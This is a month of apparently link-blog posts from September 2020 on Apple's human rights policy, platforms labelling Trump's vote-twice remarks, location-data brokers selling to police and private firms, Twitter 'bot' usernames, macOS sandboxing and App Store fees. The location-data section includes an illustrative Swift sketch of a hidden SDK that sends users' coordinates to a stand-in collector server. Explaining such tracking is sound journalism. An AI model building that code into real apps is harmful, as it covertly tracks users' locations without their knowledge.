Month: September 2020

Patrick McGee, Financial Times:

Apple has for the first time published a human rights policy that commits to respecting “freedom of information and expression”, following years of criticism that it bows to demands from Beijing and carries out censorship in mainland China, Tibet, Xinjiang and Hong Kong.

[…]

But it does not mention any particular country, nor does it refer to high-profile dilemmas like what to do when China, the world’s largest smartphone market, asks it to ban apps that help users evade censorship and surveillance.

The Apple policy merely states: “Where national law and international human rights standards differ, we follow the higher standard. Where they are in conflict, we respect national law while seeking to respect the principles of internationally recognised human rights.” 

Apple’s policy (PDF) is short — just four pages — and easily readable. Here’s the salient paragraph on handling conflicts between human rights and local laws that infringe upon them:

We work every day to make quality products, including content and services, available to our users in a way that respects their human rights. We’re required to comply with local laws, and at times there are complex issues about which we may disagree with governments and other stakeholders on the right path forward. With dialogue, and a belief in the power of engagement, we try to find the solution that best serves our users — their privacy, their ability to express themselves, and their access to reliable information and helpful technology.

A report last month by Wayne Ma for The Information explored a number of ways Apple has managed to work around the legal requirements imposed by, in particular, the Chinese government. The App Store has generally been given a longer leash and less scrutiny than other app marketplaces; iMessage and FaceTime are allowed to operate encrypted and without government interference; Apple has not made its source code available to authorities. Ma also noted a number of instances where Apple has responded to Chinese government enforcement by disabling a feature or shutting down a store rather than complying.

However, the best summary of that report is not so much that Apple is carefully negotiating its position in China as that these are exemptions the government is eager to crack down on. That crackdown is certainly made much easier by Apple’s centralized approach. At the same time, that approach potentially gives Apple increased leverage against measures with which it disagrees.

Molly Blackall, the Guardian:

Donald Trump suggested on Wednesday that people in North Carolina should vote twice in the November election, casting ballots both in person and by mail, despite this being a crime. When asked about the security of mail-in votes in an interview with WECT-TV, Trump said: “Let them send it in and let them go vote. And if the system is as good as they say it is then obviously they won’t be able to vote” in person.

Taylor Hatmaker, TechCrunch:

President Trump’s recent suggestion that North Carolina voters should cast multiple ballots has run afoul of Twitter’s election integrity rules. In a series of tweets Thursday morning, the president elaborated on previous statements in which he encouraged Americans to vote twice to “check” vote-by-mail systems.

[…]

Twitter added a “public interest notice” to two tweets related to those comments Thursday, citing its rules around civic and election integrity. The tweets violated the rules “specifically for encouraging people to engage in a behavior that could undermine the integrity of their individual vote,” according to Twitter spokesperson Nick Pacilio. Twitter has limited the reach of those tweets and restricted its likes, replies and retweets without comment.

[…]

Facebook added its own fact-checking notice to the same statement that Twitter deemed in violation of that platform’s rules. Now, a label at the bottom of Trump’s Facebook post contradicts the president’s suggestion that Americans try to vote twice to make sure “the mail in system worked properly.”

Charlie Warzel, New York Times:

Reading Mr. Zuckerberg’s election security blog post reminded me of a line from a seminal 2017 article by the journalist Max Read. Three years ago, Mr. Read was struck by a similar pledge from Mr. Zuckerberg to “ensure the integrity” of the German elections. The commitment was admirable, he wrote, but also a tacit admission of Facebook’s immense power. “It’s a declaration that Facebook is assuming a level of power at once of the state and beyond it, as a sovereign, self-regulating, suprastate entity within which states themselves operate.”

[…]

But what does it say that one of those institutions charged with protecting democracy is, itself, structured more like a dictatorship?

One of the unique traits of this era of history that I am not entirely thrilled about is the prospect of entrusting the electoral integrity of a superpower, in part, to the corporate guidance of a thirty-six-year-old guy keeping in check the deranged mouth farts of an ascended reality television host who is desperate to distract from the one thousand Americans dying daily from a pandemic that, while by no means resolved anywhere, has at least been taken seriously by world leaders who value human life more than, say, their golf game.

No matter how much the leadership at Facebook and Twitter relishes its global influence, I am sure that there is a small part of the minds of Mark Zuckerberg and Jack Dorsey that wishes things were simpler — that they could rewind to ten years ago, when the biggest Facebook controversy was how much work time was being wasted playing Farmville. That would be easier than figuring out how to handle the conspiracy theories of the U.S. president. I hope that both companies have plans in place for various election day situations. It seems pretty likely that, regardless of the result, this president will not be clear, direct, or honest. Why would he start now?

There is a remarkable series of stories that Joseph Cox of Motherboard has been reporting over the past couple of months, describing the ways location data, IP addresses, and other private information are being sold to vendors and, eventually, law enforcement. I think these articles are best presented together, for the fullest context.

Here’s the first — police are purchasing illegally obtained website data through intermediaries:

Hackers break into websites, steal information, and then publish that data all the time, with other hackers or scammers then using it for their own ends. But breached data now has another customer: law enforcement.

Some companies are selling government agencies access to data stolen from websites in the hope that it can generate investigative leads, with the data including passwords, email addresses, IP addresses, and more.

Motherboard obtained webinar slides by a company called SpyCloud presented to prospective customers. In that webinar, the company claimed to “empower investigators from law enforcement agencies and enterprises around the world to more quickly and efficiently bring malicious actors to justice.” The slides were shared by a source who was concerned about law enforcement agencies buying access to hacked data. SpyCloud confirmed the slides were authentic to Motherboard.

Here’s another — the United States Secret Service purchased a license to Babel Street’s Locate X. You may remember that name from a Wall Street Journal story last month, which I covered, showing that multiple U.S. government agencies had contracts with private location tracking companies. Cox:

The Secret Service paid for a product that gives the agency access to location data generated by ordinary apps installed on peoples’ smartphones, an internal Secret Service document confirms.

The sale highlights the issue of law enforcement agencies buying information, and in particular location data, that they would ordinarily need a warrant or court order to obtain. This contract relates to the sale of Locate X, a product from a company called Babel Street.

Finally, published yesterday, a story about a private spy company that buys location data:

A threat intelligence firm called HYAS, a private company that tries to prevent or investigates hacks against its clients, is buying location data harvested from ordinary apps installed on peoples’ phones around the world, and using it to unmask hackers. The company is a business, not a law enforcement agency, and claims to be able to track people to their “doorstep.”

[…]

Motherboard found several location data companies that list HYAS in their privacy policies. One of those is X-Mode, a company that plants its own code into ordinary smartphone apps to then harvest location information. An X-Mode spokesperson told Motherboard in an email that the company’s data collecting code, or software development kit (SDK), is in over 400 apps and gathers information on 60 million global monthly users on average. X-Mode also develops some of its own apps which use location data, including parental monitoring app PlanC and fitness tracker Burn App.

Many of these apps are distributed by a developer called Launch LLC. So you think you’re downloading a simple app from some no-name developer, when it’s actually from this X-Mode data brokerage company, which sells your data to HYAS which, in turn, distributes it to law enforcement and intelligence agencies to mine without a warrant.
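To make the mechanics concrete, here is a minimal, purely hypothetical Swift sketch of the pattern Cox describes: an SDK embedded in an ordinary app that quietly forwards device coordinates to a broker’s server. Every name and endpoint below is invented for illustration; this is not X-Mode’s actual code.

```swift
import Foundation
import CoreLocation

// Hypothetical sketch of an embedded location-harvesting SDK. It rides
// on whatever location permission the host app obtains; the user only
// ever sees a prompt shown under the host app's name.
final class HarvesterSDK: NSObject, CLLocationManagerDelegate {
    private let manager = CLLocationManager()
    private let endpoint = URL(string: "https://collector.example.com/v1/pings")! // invented

    func start() {
        manager.delegate = self
        manager.requestAlwaysAuthorization() // permission prompt credits the host app
        manager.startUpdatingLocation()
    }

    func locationManager(_ manager: CLLocationManager, didUpdateLocations locations: [CLLocation]) {
        guard let location = locations.last else { return }
        // Forward a timestamped coordinate to the broker's server.
        var request = URLRequest(url: endpoint)
        request.httpMethod = "POST"
        request.httpBody = try? JSONEncoder().encode([
            "lat": location.coordinate.latitude,
            "lon": location.coordinate.longitude,
            "ts": location.timestamp.timeIntervalSince1970,
        ])
        URLSession.shared.dataTask(with: request).resume()
    }
}
```

The point of the sketch is how little is involved: a few dozen lines buried in an app’s dependencies, a single permission prompt shown under the host app’s name, and a stream of timestamped coordinates flowing to a server the user has never heard of.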

The fact that these marketplaces are even possible is absurd and outrageous. A lack of strict regulations for the collection and use of personal data — particularly in the United States, given the number of tech companies based there — puts everyone at risk.

Just a couple of months ago, a massive Oracle BlueKai database was found to be leaking data from an estimated 1% of all traffic on the web. A report released last week indicated that just a handful of often-visited websites are needed to reliably “fingerprint” someone, and dozens of companies have the potential to do so.

We constantly generate so much private data on the smartphones we carry everywhere. Yet the collection, use, and resale of that data are basically unregulated. The scale of it is unknown, since many of the organizations responsible go out of their way to hide their activities. I am sure that all of this has the potential to catch criminals, but at what cost?

Yesterday, the U.S. Court of Appeals for the Ninth Circuit unanimously confirmed that the NSA’s bulk collection of Americans’ phone records was illegal, finding no evidence that it ever caught or convicted a single terrorist. But, even if it had helped, the program would still have been illegal, because bulk surveillance is antithetical to a healthy democracy. If anything, this decision demonstrated that federal agencies are more constrained than private companies in their ability to collect information like this. That makes sense — the state should not be spying on its citizens — but Cox’s reporting shows that the private sector has provided a convenient workaround.

Perhaps it is possible to update the law to require a warrant for surveillance by proxy, and for it to be more targeted, but it is highly unethical to be collecting this much information in the first place for the purposes of stockpiling and bulk sales. This circumstance should not be possible — even in theory. That is not for the purposes of making legitimate investigations harder, but to ensure privacy and security for everyone. The software we use should not be snitching our location to some two-bit private intelligence firm for resale to whomever it determines to be an agreeable customer. You might be comfortable with the U.S. Secret Service buying access to your location; maybe you’re fine with other law enforcement agencies and private companies that may have similar contracts. But, sooner or later, I am certain we will find out that some disagreeable entity — maybe a company that behaves unethically, or maybe some authoritarian state — also tracks people around the world. Then what? Stopping this data brokerage industry is not paranoia; it is pragmatic.

Darius Kazemi (via Andy Baio):

There’s a common belief that Twitter accounts with usernames like @jsmith12345678 must be bots, or trolls, or otherwise nefarious actors.

The thing is, since at least as far back as December 2017, the Twitter signup process has not allowed you to choose your own username! It instead gives you a name based on your first and last name, plus eight numbers on the end. You aren’t prompted to pick a more distinctive username after that, and you can change it but you need to figure out how to do it yourself.

One of the great mysteries of the last four years is how eager Twitter users are to call each other a “bot”. Another is how robot-like many of the accounts on Twitter appear to be. There are common traits: they react almost impossibly quickly to tweets from politicians and journalists alike; they use loads of emoji in their screen names; they stuff their bios full of hashtags and the phrase “no DMs”. They often ride dangerously close to a parody of whatever party line they toe and, consequently, post nothing of substance. They also tend to swarm hashtags and specific phrases in order to get topics to trend.

So, I have to wonder: are these accounts truly some form of scripted entity, or are they just morons with fast fingers? It sure is hard to tell.

Update: Kylie Brakeman’s take is far better than mine.

Brent Simmons:

NetNewsWire lets you set the default RSS reader to itself or any other RSS reader. It’s an important feature.

Now that we’re sandboxing the app, we’re losing that feature, as LSSetDefaultHandlerForURLScheme is apparently disallowed for sandboxed apps.

Michael Tsai:

This is a good example of how the sandbox still feels half-baked. 9 years later, it’s not documented that this function doesn’t work in sandboxed apps. There’s no replacement API, e.g. that asks the user whether it’s OK to change the URL handler. The system UI for setting the preferred RSS app has been removed, so the user can’t do it manually.

This limitation kind of makes sense if you squint a bit: sandboxing puts a wall around what an app knows about its external environment, and an app ignorant of everything else it shares a processor with cannot possibly configure defaults for the rest of the machine. Some of the people replying to Simmons suggest creating a utility “helper” app, distributed separately, to set a default URL handler for feed URL schemes — an almost comically inefficient workaround. I like sandboxing in principle, but stuff like this makes its MacOS implementation feel thoughtless and shallow.
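For context, the call in question is a single Launch Services function. Here is a minimal sketch of what a non-sandboxed feed reader can do, using a placeholder bundle identifier:

```swift
import Foundation
import CoreServices

// In a non-sandboxed app, claiming the system-wide "feed" URL scheme is
// one Launch Services call. Under the App Sandbox, this same call is
// apparently disallowed, which is the limitation Simmons describes.
// The bundle identifier below is a placeholder.
let status = LSSetDefaultHandlerForURLScheme(
    "feed" as CFString,
    "com.example.MyFeedReader" as CFString
)
if status != noErr {
    print("Could not become the default feed reader (OSStatus \(status))")
}
```

This also explains the helper-app suggestion: a separately distributed helper is not bound by the main app’s sandbox, so it can make this call on the app’s behalf — at the cost of shipping and maintaining a second app.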

Oliver Reichenstein, writing on the iA blog:

Ads are digital goods. What else are ads? Spiritual goods? They are the digital good. They are what is driving the digital economy in the first place! And, yes, Facebook, Instagram, Twitter, and so on do have direct transactions built into the apps. And, no, they do not pay any fees to Apple for these in-app transactions.

Apple keeps repeating that the rules are the same for all, but they are not. The top ten apps do sell digital goods and only two of the top ten apps pay Apple. Netflix and Amazon. Netflix and Amazon have found a backdoor to avoid the 30% tax. One difference between the big apps and those who pay Apple is that they charge consumers. The top 5 apps are ad-based, feed on our privacy, and charge companies for it. You may have noticed that the big ones who are charged, companies like Netflix, Amazon, and Spotify also happen to be direct competitors of Apple.

Apple also has a small ads business with the App Store, thereby kind-of-sort-of competing with Google — but point taken.

This is not in strict opposition to the App Store guidelines. Buying ads does not “unlock features or functionality within [an] app” any more than, say, using a banking app to send or receive money. Neither uses in-app purchases because it would not make sense. But that is an awfully thin line that, as Reichenstein writes, benefits ad-supported anti-privacy apps over those that have a one-time or monthly cost.